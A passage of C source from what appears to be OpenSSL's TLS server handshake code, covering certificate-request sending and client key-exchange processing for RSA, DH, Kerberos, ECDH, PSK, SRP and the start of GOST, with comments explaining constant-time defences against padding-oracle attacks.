* the actual encoded point itself
*/
*p = NAMED_CURVE_TYPE;
p += 1;
*p = 0;
p += 1;
*p = curve_id;
p += 1;
*p = encodedlen;
p += 1;
memcpy((unsigned char*)p,
(unsigned char *)encodedPoint,
encodedlen);
OPENSSL_free(encodedPoint);
encodedPoint = NULL;
p += encodedlen;
}
#endif
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* copy PSK identity hint */
s2n(strlen(s->ctx->psk_identity_hint), p);
strncpy((char *)p, s->ctx->psk_identity_hint, strlen(s->ctx->psk_identity_hint));
p+=strlen(s->ctx->psk_identity_hint);
}
#endif
/* not anonymous */
if (pkey != NULL)
{
/* n is the length of the params; they start at d
* and p points to the space at the end. */
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
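/* Pre-TLS1.2 RSA signature: hash client_random || server_random ||
* params with both MD5 and SHA-1, then RSA-sign the concatenated
* digests (NID_md5_sha1). */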
q=md_buf;
j=0;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,d,n);
EVP_DigestFinal_ex(&md_ctx,q,
(unsigned int *)&i);
q+=i;
j+=i;
}
if (RSA_sign(NID_md5_sha1, md_buf, j,
&(p[2]), &u, pkey->pkey.rsa) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_RSA);
goto err;
}
s2n(u,p);
n+=u+2;
}
else
#endif
if (md)
{
/* send signature algorithm */
if (SSL_USE_SIGALGS(s))
{
if (!tls12_get_sigandhash(p, pkey, md))
{
/* Should never happen */
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
p+=2;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using hash %s\n",
EVP_MD_name(md));
#endif
EVP_SignInit_ex(&md_ctx, md, NULL);
EVP_SignUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_SignUpdate(&md_ctx,d,n);
if (!EVP_SignFinal(&md_ctx,&(p[2]),
(unsigned int *)&i,pkey))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_LIB_EVP);
goto err;
}
s2n(i,p);
n+=i+2;
if (SSL_USE_SIGALGS(s))
n+= 2;
}
else
{
/* Is this error check actually needed? */
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNKNOWN_PKEY_TYPE);
goto f_err;
}
}
ssl_set_handshake_header(s, SSL3_MT_SERVER_KEY_EXCHANGE, n);
}
s->state = SSL3_ST_SW_KEY_EXCH_B;
EVP_MD_CTX_cleanup(&md_ctx);
return ssl_do_write(s);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
#ifndef OPENSSL_NO_ECDH
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
BN_CTX_free(bn_ctx);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
int ssl3_send_certificate_request(SSL *s)
{
unsigned char *p,*d;
int i,j,nl,off,n;
STACK_OF(X509_NAME) *sk=NULL;
X509_NAME *name;
BUF_MEM *buf;
if (s->state == SSL3_ST_SW_CERT_REQ_A)
{
buf=s->init_buf;
d=p=ssl_handshake_start(s);
/* get the list of acceptable cert types */
p++;
n=ssl3_get_req_cert_type(s,p);
d[0]=n;
p+=n;
n++;
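/* n now covers the certificate-type count byte plus the list itself */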
if (SSL_USE_SIGALGS(s))
{
const unsigned char *psigs;
unsigned char *etmp = p;
nl = tls12_get_psigalgs(s, &psigs);
/* Skip over length for now */
p += 2;
nl = tls12_copy_sigalgs(s, p, psigs, nl);
/* Now fill in length */
s2n(nl, etmp);
p += nl;
n += nl + 2;
}
off=n;
p+=2;
n+=2;
sk=SSL_get_client_CA_list(s);
nl=0;
if (sk != NULL)
{
for (i=0; i<sk_X509_NAME_num(sk); i++)
{
name=sk_X509_NAME_value(sk,i);
j=i2d_X509_NAME(name,NULL);
if (!BUF_MEM_grow_clean(buf,SSL_HM_HEADER_LENGTH(s)+n+j+2))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p = ssl_handshake_start(s) + n;
if (!(s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
{
s2n(j,p);
i2d_X509_NAME(name,&p);
n+=2+j;
nl+=2+j;
}
else
{
d=p;
i2d_X509_NAME(name,&p);
j-=2; s2n(j,d); j+=2;
n+=j;
nl+=j;
}
}
}
/* else no CA names */
p = ssl_handshake_start(s) + off;
s2n(nl,p);
ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_REQUEST, n);
#ifdef NETSCAPE_HANG_BUG
if (!SSL_IS_DTLS(s))
{
if (!BUF_MEM_grow_clean(buf, s->init_num + 4))
{
SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,ERR_R_BUF_LIB);
goto err;
}
p=(unsigned char *)s->init_buf->data + s->init_num;
/* do the header */
*(p++)=SSL3_MT_SERVER_DONE;
*(p++)=0;
*(p++)=0;
*(p++)=0;
s->init_num += 4;
}
#endif
s->state = SSL3_ST_SW_CERT_REQ_B;
}
/* SSL3_ST_SW_CERT_REQ_B */
return ssl_do_write(s);
err:
return(-1);
}
int ssl3_get_client_key_exchange(SSL *s)
{
int i,al,ok;
long n;
unsigned long alg_k;
unsigned char *p;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
EVP_PKEY *pkey=NULL;
#endif
#ifndef OPENSSL_NO_DH
BIGNUM *pub=NULL;
DH *dh_srvr, *dh_clnt = NULL;
#endif
#ifndef OPENSSL_NO_KRB5
KSSL_ERR kssl_err;
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
EC_KEY *srvr_ecdh = NULL;
EVP_PKEY *clnt_pub_pkey = NULL;
EC_POINT *clnt_ecpoint = NULL;
BN_CTX *bn_ctx = NULL;
#endif
n=s->method->ssl_get_message(s,
SSL3_ST_SR_KEY_EXCH_A,
SSL3_ST_SR_KEY_EXCH_B,
SSL3_MT_CLIENT_KEY_EXCHANGE,
2048, /* ??? */
&ok);
if (!ok) return((int)n);
p=(unsigned char *)s->init_msg;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
unsigned char rand_premaster_secret[SSL_MAX_MASTER_KEY_LENGTH];
int decrypt_len;
unsigned char decrypt_good, version_good;
size_t j;
/* FIX THIS UP EAY EAY EAY EAY */
if (s->s3->tmp.use_rsa_tmp)
{
if ((s->cert != NULL) && (s->cert->rsa_tmp != NULL))
rsa=s->cert->rsa_tmp;
/* Don't do a callback because rsa_tmp should
* have been sent already */
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_PKEY);
goto f_err;
}
}
else
{
pkey=s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey;
if ( (pkey == NULL) ||
(pkey->type != EVP_PKEY_RSA) ||
(pkey->pkey.rsa == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
rsa=pkey->pkey.rsa;
}
/* TLS and [incidentally] DTLS{0xFEFF} */
if (s->version > SSL3_VERSION && s->version != DTLS1_BAD_VER)
{
n2s(p,i);
if (n != i+2)
{
if (!(s->options & SSL_OP_TLS_D5_BUG))
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
else
p-=2;
}
else
n=i;
}
/*
* Reject overly short RSA ciphertext because we want to be sure
* that the buffer size makes it safe to iterate over the entire
* size of a premaster secret (SSL_MAX_MASTER_KEY_LENGTH). The
* actual expected size is larger due to RSA padding, but the
* bound is sufficient to be safe.
*/
if (n < SSL_MAX_MASTER_KEY_LENGTH)
{
al = SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
goto f_err;
}
/* We must not leak whether a decryption failure occurs because
* of Bleichenbacher's attack on PKCS #1 v1.5 RSA padding (see
* RFC 2246, section 7.4.7.1). The code follows the advice of
* the TLS RFC and generates a random premaster secret for the
* case that the decrypt fails. See
* https://tools.ietf.org/html/rfc5246#section-7.4.7.1 */
/* should be RAND_bytes, but we cannot work around a failure. */
if (RAND_pseudo_bytes(rand_premaster_secret,
sizeof(rand_premaster_secret)) <= 0)
goto err;
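/* decrypt in place; the result length and version bytes are
* checked in constant time below to avoid a padding oracle */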
decrypt_len = RSA_private_decrypt((int)n,p,p,rsa,RSA_PKCS1_PADDING);
ERR_clear_error();
/* decrypt_len should be SSL_MAX_MASTER_KEY_LENGTH.
* decrypt_good will be 0xff if so and zero otherwise. */
decrypt_good = constant_time_eq_int_8(decrypt_len, SSL_MAX_MASTER_KEY_LENGTH);
/* If the version in the decrypted pre-master secret is correct
* then version_good will be 0xff, otherwise it'll be zero.
* The Klima-Pokorny-Rosa extension of Bleichenbacher's attack
* (http://eprint.iacr.org/2003/052/) exploits the version
* number check as a "bad version oracle". Thus version checks
* are done in constant time and are treated like any other
* decryption error. */
version_good = constant_time_eq_8(p[0], (unsigned)(s->client_version>>8));
version_good &= constant_time_eq_8(p[1], (unsigned)(s->client_version&0xff));
/* The premaster secret must contain the same version number as
* the ClientHello to detect version rollback attacks
* (strangely, the protocol does not offer such protection for
* DH ciphersuites). However, buggy clients exist that send the
* negotiated protocol version instead if the server does not
* support the requested protocol version. If
* SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients. */
if (s->options & SSL_OP_TLS_ROLLBACK_BUG)
{
unsigned char workaround_good;
workaround_good = constant_time_eq_8(p[0], (unsigned)(s->version>>8));
workaround_good &= constant_time_eq_8(p[1], (unsigned)(s->version&0xff));
version_good |= workaround_good;
}
/* Both decryption and version must be good for decrypt_good
* to remain non-zero (0xff). */
decrypt_good &= version_good;
/*
* Now copy rand_premaster_secret over from p using
* decrypt_good_mask. If decryption failed, then p does not
* contain valid plaintext, however, a check above guarantees
* it is still sufficiently large to read from.
*/
for (j = 0; j < sizeof(rand_premaster_secret); j++)
{
p[j] = constant_time_select_8(decrypt_good, p[j],
rand_premaster_secret[j]);
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
p,sizeof(rand_premaster_secret));
OPENSSL_cleanse(p,sizeof(rand_premaster_secret));
}
else
#endif
#ifndef OPENSSL_NO_DH
if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
int idx = -1;
EVP_PKEY *skey = NULL;
if (n)
n2s(p,i);
else
i = 0;
if (n && n != i+2)
{
if (!(s->options & SSL_OP_SSLEAY_080_CLIENT_DH_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG);
goto err;
}
else
{
p-=2;
i=(int)n;
}
}
if (alg_k & SSL_kDHr)
idx = SSL_PKEY_DH_RSA;
else if (alg_k & SSL_kDHd)
idx = SSL_PKEY_DH_DSA;
if (idx >= 0)
{
skey = s->cert->pkeys[idx].privatekey;
if ((skey == NULL) ||
(skey->type != EVP_PKEY_DH) ||
(skey->pkey.dh == NULL))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_RSA_CERTIFICATE);
goto f_err;
}
dh_srvr = skey->pkey.dh;
}
else if (s->s3->tmp.dh == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
else
dh_srvr=s->s3->tmp.dh;
if (n == 0L)
{
/* Get pubkey from cert */
EVP_PKEY *clkey=X509_get_pubkey(s->session->peer);
if (clkey)
{
if (EVP_PKEY_cmp_parameters(clkey, skey) == 1)
dh_clnt = EVP_PKEY_get1_DH(clkey);
}
if (dh_clnt == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
EVP_PKEY_free(clkey);
pub = dh_clnt->pub_key;
}
else
pub=BN_bin2bn(p,i,NULL);
if (pub == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BN_LIB);
goto err;
}
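/* compute the shared DH secret into p; i is its length in bytes */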
i=DH_compute_key(p,pub,dh_srvr);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_DH_LIB);
BN_clear_free(pub);
goto err;
}
DH_free(s->s3->tmp.dh);
s->s3->tmp.dh=NULL;
if (dh_clnt)
DH_free(dh_clnt);
else
BN_clear_free(pub);
pub=NULL;
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,p,i);
OPENSSL_cleanse(p,i);
if (dh_clnt)
return 2;
}
else
#endif
#ifndef OPENSSL_NO_KRB5
if (alg_k & SSL_kKRB5)
{
krb5_error_code krb5rc;
krb5_data enc_ticket;
krb5_data authenticator;
krb5_data enc_pms;
KSSL_CTX *kssl_ctx = s->kssl_ctx;
EVP_CIPHER_CTX ciph_ctx;
const EVP_CIPHER *enc = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char pms[SSL_MAX_MASTER_KEY_LENGTH
+ EVP_MAX_BLOCK_LENGTH];
int padl, outl;
krb5_timestamp authtime = 0;
krb5_ticket_times ttimes;
EVP_CIPHER_CTX_init(&ciph_ctx);
if (!kssl_ctx) kssl_ctx = kssl_ctx_new();
n2s(p,i);
enc_ticket.length = i;
if (n < (long)(enc_ticket.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
enc_ticket.data = (char *)p;
p+=enc_ticket.length;
n2s(p,i);
authenticator.length = i;
if (n < (long)(enc_ticket.length + authenticator.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
authenticator.data = (char *)p;
p+=authenticator.length;
n2s(p,i);
enc_pms.length = i;
enc_pms.data = (char *)p;
p+=enc_pms.length;
/* Note that the length is checked again below,
** after decryption
*/
if(enc_pms.length > sizeof pms)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (n != (long)(enc_ticket.length + authenticator.length +
enc_pms.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if ((krb5rc = kssl_sget_tkt(kssl_ctx, &enc_ticket, &ttimes,
&kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_sget_tkt rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
/* Note: a missing authenticator is not considered an error,
** but will return authtime == 0.
*/
if ((krb5rc = kssl_check_authent(kssl_ctx, &authenticator,
&authtime, &kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_check_authent rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
if ((krb5rc = kssl_validate_times(authtime, &ttimes)) != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, krb5rc);
goto err;
}
#ifdef KSSL_DEBUG
kssl_ctx_show(kssl_ctx);
#endif /* KSSL_DEBUG */
enc = kssl_map_enc(kssl_ctx->enctype);
if (enc == NULL)
goto err;
memset(iv, 0, sizeof iv); /* per RFC 1510 */
if (!EVP_DecryptInit_ex(&ciph_ctx,enc,NULL,kssl_ctx->key,iv))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (!EVP_DecryptUpdate(&ciph_ctx, pms,&outl,
(unsigned char *)enc_pms.data, enc_pms.length))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!EVP_DecryptFinal_ex(&ciph_ctx,&(pms[outl]),&padl))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
outl += padl;
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!((pms[0] == (s->client_version>>8)) && (pms[1] == (s->client_version & 0xff))))
{
/* The premaster secret must contain the same version number as the
* ClientHello to detect version rollback attacks (strangely, the
* protocol does not offer such protection for DH ciphersuites).
* However, buggy clients exist that send random bytes instead of
* the protocol version.
* If SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients.
* (Perhaps we should have a separate BUG value for the Kerberos cipher)
*/
if (!(s->options & SSL_OP_TLS_ROLLBACK_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_AD_DECODE_ERROR);
goto err;
}
}
EVP_CIPHER_CTX_cleanup(&ciph_ctx);
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, pms, outl);
if (kssl_ctx->client_princ)
{
size_t len = strlen(kssl_ctx->client_princ);
if ( len < SSL_MAX_KRB5_PRINCIPAL_LENGTH )
{
s->session->krb5_client_princ_len = len;
memcpy(s->session->krb5_client_princ,kssl_ctx->client_princ,len);
}
}
/*- Was doing kssl_ctx_free() here,
* but it caused problems for apache.
* kssl_ctx = kssl_ctx_free(kssl_ctx);
* if (s->kssl_ctx) s->kssl_ctx = NULL;
*/
}
else
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
if (alg_k & (SSL_kECDHE|SSL_kECDHr|SSL_kECDHe))
{
int ret = 1;
int field_size = 0;
const EC_KEY *tkey;
const EC_GROUP *group;
const BIGNUM *priv_key;
/* initialize structures for server's ECDH key pair */
if ((srvr_ecdh = EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Let's get server private key and group information */
if (alg_k & (SSL_kECDHr|SSL_kECDHe))
{
/* use the certificate */
tkey = s->cert->pkeys[SSL_PKEY_ECC].privatekey->pkey.ec;
}
else
{
/* use the ephemeral values we saved when
* generating the ServerKeyExchange msg.
*/
tkey = s->s3->tmp.ecdh;
}
group = EC_KEY_get0_group(tkey);
priv_key = EC_KEY_get0_private_key(tkey);
if (!EC_KEY_set_group(srvr_ecdh, group) ||
!EC_KEY_set_private_key(srvr_ecdh, priv_key))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* Let's get client's public key */
if ((clnt_ecpoint = EC_POINT_new(group)) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if (n == 0L)
{
/* Client public key was in the client certificate */
if (alg_k & SSL_kECDHE)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (((clnt_pub_pkey=X509_get_pubkey(s->session->peer))
== NULL) ||
(clnt_pub_pkey->type != EVP_PKEY_EC))
{
/* XXX: For now, we do not support client
* authentication using ECDH certificates
* so this branch (n == 0L) of the code is
* never executed. When that support is
* added, we ought to ensure the key
* received in the certificate is
* authorized for key agreement.
* ECDH_compute_key implicitly checks that
* the two ECDH shares are for the same
* group.
*/
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNABLE_TO_DECODE_ECDH_CERTS);
goto f_err;
}
if (EC_POINT_copy(clnt_ecpoint,
EC_KEY_get0_public_key(clnt_pub_pkey->pkey.ec)) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
ret = 2; /* Skip certificate verify processing */
}
else
{
/* Get client's public key from encoded point
* in the ClientKeyExchange message.
*/
if ((bn_ctx = BN_CTX_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Get encoded point length */
i = *p;
p += 1;
if (n != 1 + i)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
if (EC_POINT_oct2point(group,
clnt_ecpoint, p, i, bn_ctx) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* p is pointing to somewhere in the buffer
* currently, so set it to the start
*/
p=(unsigned char *)s->init_buf->data;
}
/* Compute the shared pre-master secret */
field_size = EC_GROUP_get_degree(group);
if (field_size <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
i = ECDH_compute_key(p, (field_size+7)/8, clnt_ecpoint, srvr_ecdh, NULL);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
EC_KEY_free(s->s3->tmp.ecdh);
s->s3->tmp.ecdh = NULL;
/* Compute the master secret */
s->session->master_key_length = s->method->ssl3_enc-> \
generate_master_secret(s, s->session->master_key, p, i);
OPENSSL_cleanse(p, i);
return (ret);
}
else
#endif
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
unsigned char *t = NULL;
unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN*2+4];
unsigned int pre_ms_len = 0, psk_len = 0;
int psk_err = 1;
char tmp_id[PSK_MAX_IDENTITY_LEN+1];
al=SSL_AD_HANDSHAKE_FAILURE;
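/* read the two-byte PSK identity length from the ClientKeyExchange */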
n2s(p,i);
if (n != i+2)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_LENGTH_MISMATCH);
goto psk_err;
}
if (i > PSK_MAX_IDENTITY_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto psk_err;
}
if (s->psk_server_callback == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_NO_SERVER_CB);
goto psk_err;
}
/* Create guaranteed NULL-terminated identity
* string for the callback */
memcpy(tmp_id, p, i);
memset(tmp_id+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
psk_len = s->psk_server_callback(s, tmp_id,
psk_or_pre_ms, sizeof(psk_or_pre_ms));
OPENSSL_cleanse(tmp_id, PSK_MAX_IDENTITY_LEN+1);
if (psk_len > PSK_MAX_PSK_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
else if (psk_len == 0)
{
/* PSK related to the given identity not found */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_IDENTITY_NOT_FOUND);
al=SSL_AD_UNKNOWN_PSK_IDENTITY;
goto psk_err;
}
/* create PSK pre_master_secret */
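/* Per RFC 4279, the plain-PSK pre-master secret is:
 *   uint16 psk_len, psk_len zero octets, uint16 psk_len, then the PSK.
 * The callback wrote the PSK at the start of psk_or_pre_ms, so it is first
 * moved to its final position and the lengths and zero padding filled in. */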
pre_ms_len=2+psk_len+2+psk_len;
t = psk_or_pre_ms;
memmove(psk_or_pre_ms+psk_len+4, psk_or_pre_ms, psk_len);
s2n(psk_len, t);
memset(t, 0, psk_len);
t+=psk_len;
s2n(psk_len, t);
if (s->session->psk_identity != NULL)
OPENSSL_free(s->session->psk_identity);
s->session->psk_identity = BUF_strdup((char *)p);
if (s->session->psk_identity == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
if (s->session->psk_identity_hint != NULL)
OPENSSL_free(s->session->psk_identity_hint);
s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
if (s->ctx->psk_identity_hint != NULL &&
s->session->psk_identity_hint == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, psk_or_pre_ms, pre_ms_len);
psk_err = 0;
psk_err:
OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_err != 0)
goto f_err;
}
else
#endif
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
int param_len;
n2s(p,i);
param_len=i+2;
if (param_len > n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_A_LENGTH);
goto f_err;
}
if (!(s->srp_ctx.A=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
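/* Reject A >= N and A == 0: a client value congruent to 0 mod N would
 * force the SRP premaster secret to a predictable value. */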
if (BN_ucmp(s->srp_ctx.A, s->srp_ctx.N) >= 0
|| BN_is_zero(s->srp_ctx.A))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
if (s->session->srp_username != NULL)
OPENSSL_free(s->session->srp_username);
s->session->srp_username = BUF_strdup(s->srp_ctx.login);
if (s->session->srp_username == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if ((s->session->master_key_length = SRP_generate_server_master_secret(s,s->session->master_key))<0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
p+=i;
}
else
#endif /* OPENSSL_NO_SRP */
if (alg_k & SSL_kGOST)
{
int ret = 0;
EVP_PKEY_CTX *pkey_ctx;
EVP_PKEY *client_pub_pkey = NULL, *pk = NULL;
unsigned char premaster_secret[32], *start;
size_t outlen=32, inlen;
unsigned long alg_a;
int Ttag, Tclass;
long Tlen;
/* Get our certificate private key*/
alg_a = s->s3->tmp.new_cipher->algorithm_auth;
if (alg_a & SSL_aGOST94)
pk = s->cert->pkeys[SSL_PKEY_GOST94].privatekey;
else if (alg_a & SSL_aGOST01)
pk = s->cert->pkeys[SSL_PKEY_GOST01].privatekey;
pkey_ctx = EVP_PKEY_CTX_new(pk,NULL);
EVP_PKEY_decrypt_init(pkey_ctx);
/* If client certificate is present and is of the same type, maybe
* use it for key exchange. Don't mind errors from
* EVP_PKEY_derive_set_peer, because it is completely valid to use
* a client certificate for authorization only. */
client_pub_pkey = X509_get_pubkey(s->session->peer);
if (client_pub_pkey)
{
if (EVP_PKEY_derive_set_peer(pkey_ctx, client_pub_pkey) <= 0)
ERR_clear_error();
}
/* Decrypt session key */
if (ASN1_get_object((const unsigned char **)&p, &Tlen, &Ttag, &Tclass, n) != V_ASN1_CONSTRUCTED ||
Ttag != V_ASN1_SEQUENCE ||
Tclass != V_ASN1_UNIVERSAL)
{
